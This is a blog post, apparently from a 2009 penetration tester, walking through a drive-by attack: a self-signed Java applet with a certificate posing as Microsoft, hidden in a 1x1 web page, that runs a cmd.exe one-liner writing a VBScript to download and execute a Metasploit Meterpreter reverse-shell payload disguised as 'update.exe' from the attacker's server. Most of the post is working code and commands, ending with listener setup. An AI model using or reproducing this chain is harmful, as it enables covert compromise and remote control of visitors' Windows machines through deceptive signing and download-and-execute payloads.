Building a Java Applet with Meterpreter Payload

July 3, 2009

At Infosec World Conference, I gave a presentation on Breaking the Browser with Rafal Los. One of the demos that I prepared was a Java Applet with a Meterpreter Payload. The demo can be found here.

In this post, we will build an Applet that executes cmd.exe. Here is the source code of the Applet:

import java.applet.*;
import java.awt.*;
import java.io.*;
public class MSFcmd extends Applet {
public void init() {
Process f;
String cmd = "cmd.exe";
try {
f = Runtime.getRuntime().exec(cmd);
}
catch(IOException e) {
e.printStackTrace();
}
Process s;
}
}

Next, we need to self-sign the applet so that it can be run with access within the browser.

Compile the Applet source code to an executable class.
javac MSFcmd.java
Package the compiled class into a JAR file.
jar cvf MSFcmd.jar MSFcmd.class
Generate key pairs.
keytool -genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass mystorepass

Sign the JAR file.
jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar SignedMSFcmd.jar MSFcmd.jar signapplet

Export the public key certificate.
keytool -export -keystore mykeystore -storepass mystorepass -alias signapplet -file mycertificate.cer

To make this easier for people to use,I built a simple bash script called makeapplet.sh.

Example of running makeapplet.sh:
./makeapplet.sh
Enter the name of the applet without the extension:
MSFcmd
[+] Packaging the compiled class into a JAR file
[+] Generating key pairs
What is your first and last name?
[Unknown]:
What is the name of your organizational unit?
[Unknown]:
Microsoft
What is the name of your organization?
[Unknown]:
Microsoft Organization
What is the name of your City or Locality?
[Unknown]:
Redmond
What is the name of your State or Province?
[Unknown]:
Seatle
What is the two-letter country code for this unit?
[Unknown]:
US
Is CN=Unknown, OU=Microsoft, O=Microsoft Organization, L=Redmond, ST=Seatle, C=US correct?
[no]:
yes

[+] Signing the JAR file

Warning:
The signer certificate will expire within six months.
[+] Exporting the public key certificate
Certificate stored in file
[+] Done

Finally, we just need to deploy the JAR and the class file.
cp SignedMSFcmd.jar /var/www/
cp MSFcmd.class /var/www/
echo “<applet code=”MSFcmd.class” archive=”SignedMSFcmd.jar”
height=”1″ width=”1″></applet>” > /var/www/index.html
sudo /etc/init.d/apache2 start
Browse to the webserver from a windows system, which will execute cmd.exe

To have the applet provide us a meterpreter reverse shell we need to modify the command that is run. First we need to construct a malicious executable using Metasploit:

The executable can be constructed by:
(replace x.x.x.x with the ip of your server)

cd /pentest/exploits/framework3
./msfpayload windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=443 R
| ./msfencode -t exe -o update.exe;
cp update.exe /var/www/
sudo chmod 755 /var/www/update.exe

Now, we need to add a command into the Java Applet to download and execute the executable:
cmd.exe /c echo Const adTypeBinary = 1 > C:\windows\apsou.vbs & echo Const adSaveCreateOverWrite = 2 >> C:\windows\apsou.vbs & echo Dim BinaryStream >> C:\windows\apsou.vbs & echo Set BinaryStream = CreateObject("ADODB.Stream") >> C:\windows\apsou.vbs & echo BinaryStream.Type = adTypeBinary >> C:\windows\apsou.vbs & echo BinaryStream.Open >> C:\windows\apsou.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> C:\windows\apsou.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> C:\windows\apsou.vbs & echo Function BinaryGetURL(URL) >> C:\windows\apsou.vbs & echo Dim Http >> C:\windows\apsou.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> C:\windows\apsou.vbs & echo Http.Open "GET", URL, False >> C:\windows\apsou.vbs & echo Http.Send >> C:\windows\apsou.vbs & echo BinaryGetURL = Http.ResponseBody >> C:\windows\apsou.vbs & echo End Function >> C:\windows\apsou.vbs & echo Set shell = CreateObject("WScript.Shell") >> C:\windows\apsou.vbs & echo shell.Run "C:\windows\update.exe" >> C:\windows\apsou.vbs & start C:\windows\apsou.vbs http://x.x.x.x/my.exe C:\windows\update.exe
(replace x.x.x.x with the ip of your server)

Reference: http://www.milw0rm.com/papers/262

Setup Metasploit to listen for the connections:
sudo ./msfconsole
use exploit/multi/handler
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST x.x.x.x
set LPORT 443
save
exploit -j


[*] Exploit running as background job.
[*] Started reverse handler
[*] Starting the payload handler…
PWN dem V0hns!

Regards,
Jabra